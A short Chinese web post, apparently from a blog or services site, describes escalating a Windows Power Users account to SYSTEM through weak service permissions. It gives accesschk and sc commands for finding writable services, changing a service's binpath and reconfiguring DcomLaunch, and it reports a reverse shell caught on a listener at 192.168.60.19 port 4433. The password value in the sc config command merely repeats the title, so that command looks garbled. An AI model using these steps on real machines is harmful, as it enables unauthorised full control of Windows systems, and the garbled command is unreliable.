Windows低权限提权
发布日期:2024-05-19 浏览次数: 专利申请、商标注册、软件著作权、资质办理快速响应热线:4006-054-001 微信:15998557370
用户test隶属于Power User组, 登入系统,IP为192.168.60.23,监听服务IP地址为192.168.60.19 用到的工具:工具:accesschk 执行accesschk.exe -uwcqv "Power Users" * 获取可以操作的服务名称信息; sc qc kdc查询kdc服务详细信息 查看系统启动的服务 修改参数binpath的值 执行sc config DcomLaunch obj= ".LocalSystem" password= "Windows低权限提权"在重新启动DcomLaunch,在192.168.60.19监听的4433端口成功获取反弹,系统权限
- 上一篇:一段困扰许久的防注入代码
- 下一篇:PowerSploit-后渗透框架工具